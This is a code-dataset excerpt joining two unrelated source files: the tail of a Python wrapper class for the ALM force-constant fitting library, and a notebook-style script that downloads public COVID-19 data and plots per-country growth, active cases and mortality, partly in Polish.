optimizer_control : dict
Parameters to use elastic net regression.
cv_l1_alpha : float (read-only)
Alpha value to minimize fitting error of elastic net regression
obtained by cross validation.
"""
def __init__(self, lavec, xcoord, numbers, verbosity=0):
"""
Parameters
----------
lavec : array_like
Basis vectors. a, b, c are given as column vectors.
shape=(3, 3), dtype='double'
xcoord : array_like
Fractional coordinates of atomic points.
shape=(num_atoms, 3), dtype='double'
numbers : array_like
Atomic numbers.
shape=(num_atoms,), dtype='intc'
verbosity : int
Level of the output frequency either 0 (no output) or
1 (normal output). Default is 0.
"""
self._id = None
self._lavec = None
self._xcoord = None
self._numbers = None
self._verbosity = False
self._kind_names = None
self._iconst = 11
self._maxorder = 1
self.lavec = lavec
self.xcoord = xcoord
self.numbers = numbers
self._verbosity = verbosity
self._output_filename_prefix = None
# Whether python parameters are needed to be copied to C++ instance
# or not.
self._need_transfer = True
# self.define() has been done or not.
self._defined = False
@property
def lavec(self):
"""Getter of basis vectors
Returns
-------
lavec : ndarray
Copy of basis vectors. a, b, c are given as row vectors.
shape=(3, 3), dtype='double', order='C'
"""
return np.array(self._lavec, dtype='double', order='C')
@lavec.setter
def lavec(self, lavec):
"""Setter of basis vectors
Parameters
----------
lavec : array_like
Basis vectors. a, b, c are given as row vectors.
shape=(3, 3), dtype='double', order='C'
"""
self._need_transfer = True
self._lavec = np.array(lavec, dtype='double', order='C')
@property
def xcoord(self):
"""Getter of atomic point coordinates
Returns
-------
xcoord : ndarray
Atomic point coordinates.
shape=(num_atom, 3), dtype='double', order='C'
"""
return np.array(self._xcoord, dtype='double', order='C')
@xcoord.setter
def xcoord(self, xcoord):
"""Setter of atomic point coordinates
Returns
-------
xcoord : ndarray
Atomic point coordinates.
shape=(num_atom, 3), dtype='double', order='C'
"""
self._need_transfer = True
self._xcoord = np.array(xcoord, dtype='double', order='C')
@property
def numbers(self):
"""Getter of atomic numbers
Returns
-------
numbers : ndarray
Atomic numbers.
shape=(num_atom,), dtype='intc', order='C'
"""
return np.array(self._numbers, dtype='intc')
@numbers.setter
def numbers(self, numbers):
"""Setter of atomic numbers
Parameters
----------
numbers : ndarray
Atomic numbers.
shape=(num_atom,), dtype='intc', order='C'
"""
self._need_transfer = True
self._numbers = np.array(numbers, dtype='intc')
self._kind_names = OrderedDict.fromkeys(self._numbers)
for key in self._kind_names:
self._kind_names[key] = atom_names[key % 118]
@property
def kind_names(self):
return self._kind_names
@property
def verbosity(self):
return self._verbosity
@verbosity.setter
def verbosity(self, verbosity):
"""Set verbosity of output.
Parameters
----------
verbosity : int
Choose the level of the output frequency from
0 (no output) or 1 (normal output).
"""
self._verbosity = verbosity
self._set_verbosity()
def set_verbosity(self, verbosity):
self.verbosity = verbosity
def __enter__(self):
self.alm_new()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.alm_delete()
def alm_new(self):
"""Create ALM instance in C++.
This is also called by context manager when entering the block.
ex.::
with ALM(lavec, xcoord, numbers) as alm:
Note
----
When an ALM instance is created by ``alm_new``, it must be deleted
by ``alm_delete`` to avoid memory leak.
"""
if self._id is None:
self._id = alm.alm_new()
if self._id < 0:
raise RuntimeError("Too many ALM objects")
if self._verbosity is not None:
self.verbosity = self._verbosity
else:
raise("This ALM object is already initialized.")
def alm_delete(self):
"""Delete ALM instance in C++.
This is also called by context manager when exiting the block.
ex.::
with ALM(lavec, xcoord, numbers) as alm:
"""
if self._id is None:
self._show_error_not_initizalied()
alm.alm_delete(self._id)
self._id = None
def suggest(self):
"""Compute displacement patterns to obtain force constants."""
if self._id is None:
self._show_error_not_initizalied()
if self._defined:
alm.suggest(self._id)
else:
self._show_error_not_defined()
def optimize(self, solver='dense'):
"""Fit force constants to forces.
Parameters
----------
solver : str, default='dense'
Solver choice for fitting either 'dense' or 'SimplicialLDLT'.
- When solver='dense', the fitting is performed with the
singular value decomposition implemented in LAPACK.
- When solver='SimplicialLDLT', the fitting is performed with
the sparse solver class SimplicialLDLT implemented in
Eigen3 library.
Returns
-------
info : int
This tells condition how fitting went.
0 if the fitting is successful, 1 otherwise.
"""
if self._id is None:
self._show_error_not_initizalied()
if not self._defined:
self._show_error_not_defined()
solvers = {'dense': 'dense', 'simplicialldlt': 'SimplicialLDLT'}
if solver.lower() not in solvers:
msgs = ["The given solver option is not supported.",
"Available options are 'dense' and 'SimplicialLDLT'."]
raise ValueError("\n".join(msgs))
info = alm.optimize(self._id, solvers[solver.lower()])
return info
@property
def output_filename_prefix(self):
return self._output_filename_prefix
@output_filename_prefix.setter
def output_filename_prefix(self, prefix):
"""Set output prefix of output filename"""
if self._id is None:
self._show_error_not_initizalied()
if type(prefix) is str:
self._output_filename_prefix = prefix
alm.set_output_filename_prefix(self._id, prefix)
def set_output_filename_prefix(self, prefix):
self.output_filename_prefix = prefix
@property
def optimizer_control(self):
if self._id is None:
self._show_error_not_initizalied()
optctrl = alm.get_optimizer_control(self._id)
keys = optimizer_control_data_types.keys()
optcontrol = dict(zip(keys, optctrl))
return optcontrol
@optimizer_control.setter
def optimizer_control(self, optcontrol):
if self._id is None:
self._show_error_not_initizalied()
keys = optimizer_control_data_types.keys()
optctrl = []
optcontrol_l = {key.lower(): optcontrol[key] for key in optcontrol}
for i, key in enumerate(optcontrol):
if key.lower() not in keys:
msg = "%s is not a valide key for optimizer control." % key
raise KeyError(msg)
for i, key in enumerate(keys):
if key in optcontrol_l:
optctrl.append(optcontrol_l[key])
else:
optctrl.append(None)
alm.set_optimizer_control(self._id, optctrl)
def set_optimizer_control(self, optcontrol):
self.optimizer_control = optcontrol
@property
def displacements(self):
"""Get displacements
Returns
--------
u : ndarray
Atomic displacement patterns in supercells in Cartesian.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
"""
if self._id is None:
self._show_error_not_initizalied()
ndata = alm.get_number_of_data(self._id)
u = np.zeros((ndata, len(self._xcoord), 3), dtype='double', order='C')
succeeded = alm.get_u_train(self._id, u)
if succeeded:
return u
else:
return None
@displacements.setter
def displacements(self, u):
"""Set displacements
Parameters
----------
u : array_like
Atomic displacement patterns in supercells in Cartesian.
shape=(supercells, num_atoms, 3), dtype='double'
"""
if self._id is None:
self._show_error_not_initizalied()
if u.ndim != 3:
msg = "Displacement array has to be three dimensions."
raise RuntimeError(msg)
alm.set_u_train(self._id, np.array(u, dtype='double', order='C'))
@property
def forces(self):
"""Get forces
Returns
--------
f : ndarray
Forces in supercells.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
"""
if self._id is None:
self._show_error_not_initizalied()
ndata = alm.get_number_of_data(self._id)
f = np.zeros((ndata, len(self._xcoord), 3), dtype='double', order='C')
succeeded = alm.get_f_train(self._id, f)
if succeeded:
return f
else:
return None
@forces.setter
def forces(self, f):
"""Set forces
Parameters
----------
f : array_like
Forces in supercells.
shape=(supercells, num_atoms, 3), dtype='double'
"""
if self._id is None:
self._show_error_not_initizalied()
if f.ndim != 3:
msg = "Force array has to be three dimensions."
raise RuntimeError(msg)
alm.set_f_train(self._id, np.array(f, dtype='double', order='C'))
def set_training_data(self, u, f):
"""Set displacements and respective forces in supercell.
Parameters
----------
u : array_like
Atomic displacement patterns in supercells in Cartesian.
dtype='double'
shape=(supercells, num_atoms, 3)
f : array_like
Forces in supercells.
dtype='double'
shape=(supercells, num_atoms, 3)
"""
self.displacements = u
self.forces = f
def set_displacement_and_force(self, u, f):
warnings.warn("set_displacement_and_force is deprecated. "
"Use set_training_data.", DeprecationWarning)
self.set_training_data(u, f)
def define(self, maxorder, cutoff_radii=None, nbody=None,
symmetrization_basis='Lattice'):
"""Define the Taylor expansion potential.
Parameters
----------
maxorder : int
Maximum order of the Taylor expansion potential.
- If ``maxorder = 1``, only harmonic (2nd-order) terms are
considered.
- If ``maxorder = 2``, both harmonic and cubic terms are
considered.
cutoff_radii : array_like, default = None
Cutoff radii defined for each order.
When a negative value is provided, the cutoff radius is not used.
dtype='double'
shape=(maxorder, num_elems, num_elems)
nbody : array_like, default = None
Option to neglect multi-body interactions.
dtype='intc'
shape=(maxorder,)
symmetrization_basis : str, default='Lattice'
Either 'Cartesian' or 'Lattice'. Symmetrization of force constants
is done either in the matrix based on crystal coordinates
('Lattice') or Cartesian coordinates ('Cartesian').
"""
if self._id is None:
self._show_error_not_initizalied()
self._transfer_parameters()
if nbody is None:
nbody = []
for i in range(maxorder):
nbody.append(i + 2)
else:
if len(nbody) != maxorder:
msg = "The size of nbody must be equal to maxorder."
raise RuntimeError(msg)
if cutoff_radii is None:
_cutoff_radii = None
else:
_cutoff_radii = np.array(cutoff_radii, dtype='double', order='C')
nelem = len(_cutoff_radii.ravel())
if (nelem // maxorder) * maxorder != nelem:
msg = "The array shape of cutoff_radii is wrong."
raise RuntimeError(msg)
nkd = int(round(np.sqrt(nelem // maxorder)))
if nkd ** 2 - nelem // maxorder != 0:
msg = "The array shape of cutoff_radii is wrong."
raise RuntimeError(msg)
_cutoff_radii = np.reshape(_cutoff_radii, (maxorder, nkd, nkd),
order='C')
self._maxorder = maxorder
if symmetrization_basis.lower() in ['lattice', 'cartesian']:
fc_basis = symmetrization_basis.capitalize()
else:
fc_basis = 'Lattice'
alm.define(self._id,
maxorder,
np.array(nbody, dtype='intc'),
_cutoff_radii,
fc_basis)
alm.init_fc_table(self._id)
self._defined = True
def set_constraint(self, translation=True, rotation=False):
"""Set constraints for the translational and rotational invariances
Parameters
----------
translation : bool, optional (default = True)
When set to ``True``, the translational invariance
(aka acoustic sum rule) is imposed between force constants.
rotation : bool, optional (default = False)
When set to ``True``, the rotational invariance is imposed between
force constants. This function is not implemented.
"""
if rotation is True:
raise("Rotational invariance is not supported in python API.")
if translation is True:
iconst = 11
else:
iconst = 10
self._iconst = iconst
alm.set_constraint_type(self._id, self._iconst)
def getmap_primitive_to_supercell(self):
"""Returns the mapping information from the primitive cell to the supercell.
Returns
-------
map_p2s : array_like
The mapping information of atoms from the primitive cell to the
supercell.
dtype='intc'
shape = (num_trans, num_atoms_primitive)
"""
if self._id is None:
self._show_error_not_initizalied()
if not self._defined:
self._show_error_not_defined()
map_p2s = np.zeros(len(self._xcoord), dtype='intc')
ntrans = alm.get_atom_mapping_by_pure_translations(self._id, map_p2s)
return map_p2s.reshape((ntrans, -1))
def get_displacement_patterns(self, fc_order):
"""Returns the displacement patterns to obtain force constants.
Parameters
----------
fc_order : int
The order of force constants to get the displacement patterns.
- If ``fc_order = 1``, returns patterns for harmonic force
constants.
- If ``fc_order = 2``, returns patterns for cubic force constants.
- If ``fc_order = 3``, returns patterns for quartic force
constants.
- ...
Returns
-------
all_disps : array_like, shape = (n_patterns,)
The array of tuples (``atom_index``, ``direction``, ``basis``),
where ``direction`` is the numpy.ndarray of size = (3,)
representing the direction of the displacement,
and ``basis`` is a string either "Cartesian" or "Fractional".
"""
if self._id is None:
self._show_error_not_initizalied()
if fc_order > self._maxorder:
msg = ("The fc_order must not be larger than the maximum order "
"(maxorder).")
raise ValueError(msg)
numbers = self._get_number_of_displaced_atoms(fc_order)
tot_num = np.sum(numbers)
atom_indices = np.zeros(tot_num, dtype='intc')
disp_patterns = np.zeros((tot_num, 3), dtype='double', order='C')
nbasis = alm.get_displacement_patterns(self._id,
atom_indices,
disp_patterns,
fc_order)
basis = ["Cartesian", "Fractional"][nbasis]
all_disps = []
pos = 0
for num in numbers:
disp = []
for i in range(num):
disp.append((atom_indices[pos], disp_patterns[pos], basis))
pos += 1
all_disps.append(disp)
return all_disps
def get_fc(self, fc_order, mode="origin", permutation=True):
"""Returns the force constant values
Parameters
----------
fc_order : int
The order of force constants to get.
- If ``fc_order = 1``, returns harmonic force constants.
- If ``fc_order = 2``, returns cubic force constants.
- If ``fc_order = 3``, returns quartic force constants.
- ...
mode : str, optional (default="origin")
The choice of the force constant list to be returned.
- If "origin", returns the reducible set of force constants,
whose first element corresponds to an atom in the
primitive cell at the origin.
- If "all", returns the all non-zero elements of force constants
in the supercell.
- If "irreducible" or "irred", returns the irreducible set of
force constants.
permutation : bool (default=True)
The flag for printing out elements with permutation symmetry.
Effective only when ``mode = origin`` or ``mode = all``.
- If True, returns force constants after replicating elements
by the permutation of indices.
- If False, returns force constants without replicating elements
by the permutation of indices. For "origin" and "all", all
indices except the first index participate to the permutation
of indices to reduce the number of the output values.
Returns
-------
fc_values : array_like, dtype='double', shape=(num_fc,)
Force constant values.
elem_indices : array_like, dtype='int', shape=(num_fc, fc_order + 1)
Array of flattened indices 3 * index_atom + index_xyz.
Note
----
This method returns force constants in Cartesian basis
when ``mode = origin`` and ``mode = all`.
When ``mode = irred``, it returns the irreducible set of
force constants in the basis defined via "symmetrization_basis"
of the alm.define method.
"""
if self._id is None:
self._show_error_not_initizalied()
if fc_order > self._maxorder:
msg = ("The fc_order must not be larger than the maximum order "
"(maxorder).")
raise ValueError(msg)
perm_int = permutation * 1
if mode == "origin":
fc_length = self._get_number_of_fc_origin(fc_order, perm_int)
fc_values = np.zeros(fc_length, dtype='double')
elem_indices = np.zeros((fc_length, fc_order + 1),
dtype='intc', order='C')
alm.get_fc_origin(self._id, fc_values, elem_indices, perm_int)
return fc_values, elem_indices
elif mode == "irreducible" or mode == "irred":
fc_length = self._get_number_of_irred_fc_elements(fc_order)
fc_values = np.zeros(fc_length, dtype='double')
elem_indices = np.zeros((fc_length, fc_order + 1),
dtype='intc', order='C')
alm.get_fc_irreducible(self._id, fc_values, elem_indices)
return fc_values, elem_indices
elif mode == "all":
map_p2s = np.zeros(len(self._xcoord), dtype='intc')
ntrans = alm.get_atom_mapping_by_pure_translations(self._id,
map_p2s)
fc_length = self._get_number_of_fc_origin(
fc_order, perm_int) * ntrans
fc_values = np.zeros(fc_length, dtype='double')
elem_indices = np.zeros((fc_length, fc_order + 1),
dtype='intc', order='C')
alm.get_fc_all(self._id, fc_values, elem_indices, perm_int)
return fc_values, elem_indices
else:
raise ValueError("Invalid mode in get_fc.")
def set_fc(self, fc_in):
"""Copy force constant obtained by an external optimizer to the ALM instance.
Parameters
----------
fc_in : array_like
The irreducible set of force constants.
dtype='double'
shape=(num_fc,)
Note
----
When an external optimizer, such as numpy.linalg.lstsq, is used to fit
force constants, the force constants need to be passed to
the ALM instance by ``set_fc`` to use the ``get_fc`` method.
"""
if self._id is None:
self._show_error_not_initizalied()
maxorder = self._maxorder
fc_length_irred = 0
for i in range(maxorder):
fc_length_irred += self._get_number_of_irred_fc_elements(i + 1)
if fc_length_irred != len(fc_in):
msg = "The size of the given force constant array is incorrect."
raise RuntimeError(msg)
alm.set_fc(self._id, np.array(fc_in, dtype='double', order='C'))
def get_matrix_elements(self):
"""Returns the sensing matrix A and force vector b
Returns
-------
amat : ndarray, dtype='double'
shape=(3 * num_atoms * ndata_training, num_fc_irred), order='F'.
The sensing matrix A calculated from the displacements.
bvec : ndarray, dtype='double'
shape=(3 * num_atoms * ndata_training,)
The vector b calculated from the atomic forces.
Note
----
From the amat (``A``) and bvec (``b``), the force constant vector ``x``
can be obtained by solving the least-square problem:
x = argmin_{x} | Ax-b|^{2}.
"""
if self._id is None:
self._show_error_not_initizalied()
maxorder = self._maxorder
nrows = self._get_nrows_amat()
fc_length = 0
for i in range(maxorder):
fc_length += self._get_number_of_irred_fc_elements(i + 1)
amat = np.zeros(nrows * fc_length, dtype='double', order='C')
bvec = np.zeros(nrows, dtype='double')
alm.get_matrix_elements(self._id, amat, bvec)
return (np.reshape(amat, (nrows, fc_length), order='F'), bvec)
@property
def cv_l1_alpha(self):
"""Returns L1 alpha at minimum CV"""
if self._id is None:
self._show_error_not_initizalied()
return alm.get_cv_l1_alpha(self._id)
def get_cv_l1_alpha(self):
return self.cv_l1_alpha
def _transfer_parameters(self):
if self._need_transfer:
self._set_cell()
self._need_transfer = False
self._defined = False
def _set_cell(self):
"""Inject crystal structure in C++ instance"""
if self._id is None:
self._show_error_not_initizalied()
if self._lavec is None:
msg = "Basis vectors are not set."
raise RuntimeError(msg)
if self._xcoord is None:
msg = "Atomic point coordinates (positions) are not set."
raise RuntimeError(msg)
if self._numbers is None:
msg = "Atomic numbers are not set."
raise RuntimeError(msg)
if len(self._xcoord) != len(self._numbers):
msg = "Numbers of atomic points and atomic numbers don't agree."
raise RuntimeError(msg)
kind_numbers = np.array(list(self._kind_names.keys()), dtype='intc')
alm.set_cell(self._id, self._lavec, self._xcoord, self._numbers,
kind_numbers)
def _set_verbosity(self):
"""Inject verbosity in C++ instance."""
if self._id is None:
self._show_error_not_initizalied()
alm.set_verbosity(self._id, self._verbosity)
def _get_nrows_amat(self):
"""Private method to return the number of training data sets"""
if self._id is None:
self._show_error_not_initizalied()
nrows_amat = alm.get_nrows_amat(self._id)
return nrows_amat
def _get_id(self):
"""Private method to return the instance ID"""
return self._id
def _get_number_of_displacement_patterns(self, fc_order):
"""Private method to return the number of displacement patterns
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
return alm.get_number_of_displacement_patterns(self._id, fc_order)
def _get_number_of_displaced_atoms(self, fc_order):
"""Private method to return the number of displaced atoms
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
num_disp_patterns = self._get_number_of_displacement_patterns(
fc_order)
numbers = np.zeros(num_disp_patterns, dtype='intc')
alm.get_number_of_displaced_atoms(self._id, numbers, fc_order)
return numbers
def _get_number_of_fc_elements(self, fc_order):
"""Private method to get the number of force constants
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
return alm.get_number_of_fc_elements(self._id, fc_order)
def _get_number_of_fc_origin(self, fc_order, permutation):
"""Private method to get the number of force constants for fc_origin
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
permutation: int
Flag to include permutated elements
permutation = 0 for skipping permutated elements,
permutation = 1 for including them
"""
return alm.get_number_of_fc_origin(self._id, fc_order, permutation)
def _get_number_of_irred_fc_elements(self, fc_order):
"""Private method to get the number of irreducible set of force constants
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
return alm.get_number_of_irred_fc_elements(self._id, fc_order)
def _show_error_not_initizalied(self):
"""Private method to raise an error"""
msg = ("This ALM instance has to be initialized by ALM.alm_new() or "
"context manager.")
raise RuntimeError(msg)
def _show_error_not_defined(self):
msg = "This ALM.define() has to be done beforehand."
raise RuntimeError(msg)
``` |
{
"source": "jochym/covid_plots",
"score": 2
} |
#### File: jochym/covid_plots/Covid_plots.py
```python
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
import matplotlib.ticker as ticker
import numpy as np
from numpy import array, arange, polyfit, log, exp, polyval, linspace
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
# %%
# Use logarithmic scales?
LOGY=True
# Select countries of general interest
selcnt = []
#selcnt += ['China', 'Korea, South']
selcnt += ['United Kingdom', 'US']
selcnt += ['Sweden','Germany','Norway']
selcnt += ['Italy', 'Spain']
selcnt += ['Russia','Brazil']
selcnt = ['US', 'Brazil', 'Mexico', 'India']
selcnt += ['Italy', 'Spain']
selcnt += ['China', 'Korea, South']
# Countries for plwiki plots
plwiki = ['Poland', 'Slovakia', 'Germany', 'Czechia', 'Ukraine', 'Belarus', 'Russia']
# Countries to read in
countries = list(set(plwiki).union(set(selcnt)))
# %% jupyter={"source_hidden": true}
# Prepare the data
def fix_names(c):
'''
Fix differences in naming in population and covid datasets
'''
mapa = {'Korea, Rep.':'Korea, South',
'United States':'US',
'Slovak Republic':'Slovakia',
'Czech Republic':'Czechia',
'Russian Federation':'Russia'
}
rmap = {v:k for k,v in mapa.items()}
if c in mapa:
return mapa[c]
elif c in rmap:
return rmap[c]
else :
return c
# Loding population data
pop = pd.read_csv('https://raw.githubusercontent.com/datasets/population/master/data/population.csv')
# Population uses different country names - map it
pop_cnt = [fix_names(c) for c in countries]
population = {fix_names(c):n for c, _, _, n in
pop[pop['Country Name'].isin(pop_cnt) & (pop.Year==2018)].values}
# Loading covid data
df = pd.read_csv('https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv', parse_dates=['Date'])
# Limit to the selected countries
df = df[df['Country'].isin(countries)]
conf = df.pivot(index='Date', columns='Country', values='Confirmed')
recov = df.pivot(index='Date', columns='Country', values='Recovered')
vict = df.pivot(index='Date', columns='Country', values='Deaths')
relgr = conf.pct_change()
# Compute per capita values (per 100_000)
confpc = conf.copy()
for country in confpc:
confpc[country] = 1e6*confpc[country]/population[country]
victpc = vict.copy()
for country in victpc:
victpc[country] = 1e6*victpc[country]/population[country]
recovpc = recov.copy()
for country in victpc:
recovpc[country] = 1e6*recovpc[country]/population[country]
# %% [markdown]
# ## Relative growth in time
#
# This one goes to the heart of exponential growth. If it is exponential its relative growth is constant. If not - we will get linear change or other curve.
# You can distinquish the exponent by its growth rate much easier.
#
# Additionally exponential decay seems to fit the growth rate curves quite well.
# %%
fig = plt.figure(figsize=(10,7))
span = 5
rel = relgr.ewm(halflife=span).mean()
for n, c in enumerate(selcnt):
m = ~ (np.isnan(rel[c].values) | np.isinf(rel[c].values))
t = np.arange(m.size)
t = rel.index.to_pydatetime()
for s, v in zip(t[m][::-1], rel[c].values[m][::-1]):
if v>0.3 :
break
mm = m & (t > s)
x = arange(rel.index.size)
fit = polyfit(x[mm], log(rel[c].values[mm]), 1)
p = plt.semilogy(rel.index[m], 100*rel[c].values[m], '.')[0]
plt.plot(rel.index[mm], 100*rel[c].values[mm], '.', label=c, color=p.get_color())
#plt.plot(rel.index[mm], 100 * exp(polyval(fit, x[mm])), color=p.get_color())
# plt.axhline(5, ls='--', label='approx. critical value (5%)')
# plt.axhline(2, ls=':', label='effective critical value (2%)')
plt.ylim(None,50)
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title('Daily relative growth of COVID-19 cases', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Relative growth (%)\n{span}-day exponential weighted mean')
plt.xlabel('Date')
plt.grid()
plt.legend()
plt.savefig('relative_growth.png');
# %% [markdown]
# ## Trajectory
# This one is inspired by the excellent https://aatishb.com/covidtrends/ page
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
span = 7
val = confpc
gr = val.diff().ewm(halflife=span).mean()
for n, c in enumerate(selcnt):
m = ~ gr[c].isnull()
plt.loglog(val[c][m].values, gr[c][m].values, '-', label=c, lw=2)
plt.xlim(10,None)
plt.ylim(1,3e2)
plt.title(f'Trajectory of COVID-19 pandemic ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel('Average of daily growth per 1 mln people\n'+
f'{span}-day exponential weighted mean')
plt.xlabel('Cases per 1 mln people')
plt.legend()
plt.grid()
plt.savefig('trajectory.png');
# %% [markdown]
# ## Other curves
# %% jupyter={"source_hidden": true}
percapitaplot = confpc.ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5, logy=LOGY)
percapitaplot.grid(color='#d4d4d4')
percapitaplot.set_xlabel('Date')
percapitaplot.set_ylabel('# of Cases per 1 mln People\n'+
f'{span}-day exponential weighted mean')
percapitaplot.set_xlim(pd.Timestamp('2020-03-1'),None)
percapitaplot.set_ylim(1e-1, None)
percapitaplot.set_title("Per Capita COVID-19 Cases",
fontsize = 16, weight = 'bold', alpha = .75);
# %% jupyter={"source_hidden": true}
percapitaplot = (confpc - recovpc - victpc).ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5)
percapitaplot.grid(color='#d4d4d4')
percapitaplot.set_xlabel('Date')
percapitaplot.set_ylabel(f'# of Active cases per 1 mln people\n'+
f'({span}-day exponential weighted mean)')
percapitaplot.set_xlim(pd.Timestamp('2020-03-1'),None)
percapitaplot.set_title("Per Capita Active COVID-19 Cases",
fontsize = 16, weight = 'bold', alpha = .75);
plt.gcf().savefig('percapita_active.png');
# %% jupyter={"source_hidden": true}
vplot = victpc.ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5, logy=False)
vplot.grid(color='#d4d4d4')
vplot.set_xlabel('Date')
vplot.set_ylabel('# of Deaths per 1 mln People\n'+
f'({span}-day exponential weighted mean)')
vplot.set_xlim(pd.Timestamp('2020-03-1'),None)
vplot.set_ylim(1e-2, None)
vplot.set_title("Per Capita deaths due to COVID-19 Cases", fontsize = 16, weight = 'bold', alpha = .75);
# %% jupyter={"source_hidden": true}
mortplt = (100*vict/conf).ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5, logy=False)
mortplt.grid(color='#d4d4d4')
mortplt.set_xlim(pd.Timestamp('2020-03-1'),None)
mortplt.set_ylim(0, 20)
mortplt.set_xlabel('Date')
mortplt.set_ylabel('Mortality rate (%)\n'+f'{span}-day exponential weighted mean')
mortplt.set_title('Mortality rate due to COVID-19', fontsize = 16, weight = 'bold', alpha = .75);
# %% [markdown]
# ## Polish Wikipedia plots
# These are plots created for Polish Wikipedia
# %%
fig = plt.figure(figsize=(10,7))
def plleg(c):
pl = {
'Poland':'Polska',
'Slovakia': 'Słowacja',
'Germany': 'Niemcy',
'Czechia': 'Czechy',
'Ukraine': 'Ukraina',
'Belarus': 'Białoruś',
'Russia': 'Rosja'
}
if c in pl:
return pl[c]
else :
return c
span = 3
rel = relgr.ewm(halflife=span).mean()
model = {}
for n, c in enumerate(plwiki):
m = ~ (np.isnan(rel[c].values) | np.isinf(rel[c].values))
t = np.arange(m.size)
t = rel.index.to_pydatetime()
for s, v in zip(t[m][::-1], rel[c].values[m][::-1]):
if v>0.3 :
break
mm = m & (t > s)
x = arange(rel.index.size)
fit = polyfit(x[mm], log(rel[c].values[mm]), 1)
model[c] = fit, x[mm]
p = plt.semilogy(rel.index[m], 100*rel[c].values[m], '.')[0]
plt.plot(rel.index[mm], 100*rel[c].values[mm],
'o' if c=='Poland' else '.',
color=p.get_color(), label=plleg(c),
zorder = 3 if c=='Poland' else 2,
)
# plt.plot(rel.index[mm], 100 * exp(polyval(fit, x[mm])),
# color=p.get_color(),
# lw=3 if c=='Poland' else 2,
# zorder = 3 if c=='Poland' else 2)
# plt.axhline(5, ls='--', label='Przybliżony poziom krytyczny (5%)')
# plt.axhline(2, ls=':', label='Efektywny poziom krytyczny (2%)')
plt.ylim(None,50)
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title(f'Dzienny wzrost przypadków COVID-19 ({str(rel.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Dzienny wzrost zakażeń (%, {span}-dniowa wykładnicza średnia krocząca)')
plt.xlabel('Data')
plt.grid()
plt.legend(loc='lower left')
plt.savefig('wzrosty_dzienne.png', dpi=72);
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
val = confpc
span = 7
gr = val.diff().ewm(halflife=span).mean()
for n, c in enumerate(plwiki):
m = ~ gr[c].isnull()
p = plt.loglog(val[c][m].values, gr[c][m].values,
'-', lw=3 if c=='Poland' else 2, label=plleg(c),
zorder = 3 if c=='Poland' else 2)
(b, a), t = model[c]
c0 = val[c][-1]/exp(exp(b*t.max()+a)/b)
ci = gr[c][m].values[-1]/(exp(exp(b*t.max()+a)/b)*exp(b*t.max()+a))
t = linspace(t.min(), t.max()+60, 100)
#plt.loglog(exp(exp(b*t+a)/b)*c0,exp(exp(b*t+a)/b)*exp(b*t+a)*ci, ls=':', color=p[0].get_color())
plt.xlim(2,None)
plt.ylim(0.1,None)
plt.title(f'Trajektoria epidemii COVID-19 ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel('Średni dzienny przyrost zakażeń na 1 mln mieszkańców\n'+
f'{span}-dniowa wykładnicza średnia krocząca')
plt.xlabel('Liczba przypadków na 1 mln mieszkańców')
plt.legend(loc='upper left')
plt.grid()
plt.savefig('trajektoria_covid.png', dpi=72);
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
val = (confpc - recovpc - victpc)
span = 3
val = val.ewm(halflife=span).mean()
for n, c in enumerate(plwiki):
m = ~ (np.isnan(val[c].values) | np.isinf(val[c].values))
plt.plot(val.index[m], val[c].values[m], '-',
lw=3 if c=='Poland' else 2, label=plleg(c),
zorder = 3 if c=='Poland' else 2
)
plt.ylim(1e-2,None)
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title(f'Liczba aktywnych przypadków COVID-19 ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Aktywne przypadki na 1 mln. mieszkańców\n({span}-dniowa wykładnicza średnia krocząca)')
plt.xlabel('Data')
plt.grid()
plt.legend(loc='upper left')
plt.savefig('aktywne_przypadki.png', dpi=72);
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
val = (confpc - recovpc - victpc)
span = 3
val = val.diff().ewm(halflife=span).mean()
for n, c in enumerate(plwiki):
m = ~ (np.isnan(val[c].values) | np.isinf(val[c].values))
plt.plot(val.index[m], val[c].values[m], '-',
lw=3 if c=='Poland' else 2, label=plleg(c),
zorder = 3 if c=='Poland' else 2
)
plt.ylim(None,None)
plt.axhline(ls='--', label='Zerowy wzrost')
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title(f'Wzrost aktywnych przypadków COVID-19 ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Wzrost dzienny aktywnych przypadków na 1 mln. mieszkańców\n({span}-dniowa wykładnicza średnia krocząca)')
plt.xlabel('Data')
plt.grid()
plt.legend(loc='upper left')
plt.savefig('aktywne_wzrost.png', dpi=72);
# %% [markdown]
# ## Experiments
#
# Here are some experiments with modelling based on the remarkable good fit
# of the relative daily growth curves. This is not very much work in progress.
